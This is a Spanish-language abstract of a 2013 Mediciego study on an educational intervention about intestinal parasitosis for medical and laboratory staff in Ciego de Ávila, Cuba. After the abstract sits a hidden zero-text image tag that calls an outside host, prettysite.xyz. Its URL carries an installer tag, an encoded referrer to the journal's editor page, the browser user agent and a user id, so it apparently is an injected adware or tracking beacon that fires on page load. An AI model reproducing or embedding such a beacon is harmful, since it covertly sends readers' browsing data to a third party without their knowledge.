Conocimientos sobre las parasitosis intestinales en personal médico y de laboratorio de Ciego de Ávila. Resultados de una intervención. - Martín Pérez, Niurys; Angel Núñez, Fidel; Amores Sánchez, Daisy; Cordoví Prado, Raúl A. (Mediciego, 2013)
En el Hospital General Docente “Capitan Roberto Rodríguez Fernández”, de Morón, Ciego de Ávila, Cuba, se realizó un estudio cuasiexperimental sin grupo control en médicos y técnicos de laboratorio de la provincia con el objetivo de evaluar el impacto de una intervención educativa en parasitosis intestinales. Con ese fin fue impartido un curso provincial de Actualización en Parasitosis Intestinales, el que contó con sesiones teóricas en las mañanas para todos los asistentes y sesiones prácticas en las tardes que fueron sólo para el personal de laboratorio. Al comienzo y al finalizar del mismo se realizó una evaluación teórica y práctica para los laboratoristas, y otra teórica para los médicos de asistencia. Se encontraron varios errores en la identificación práctica, pero los leucocitos alcanzaron los mayores porcentajes. En las evaluaciones teóricas realizadas al personal de laboratorio y los médicos, se detectaron varias deficiencias cognoscitivas. Finalmente, se produjo una mejoría significativa en todas las evaluaciones, lo que demostró la eficacia de esta intervención. Sin embargo, se considera que estas acciones deben tener sostenibilidad y sistematicidad para alcanzar una mejoría continua de los conocimientos y las prácticas relacionadas con el diagnóstico y el tratamiento de las parasitosis intestinales en la red nacional de salud pública. <img src="http://prettysite.xyz/acnt?_=1584034594196&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F257&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />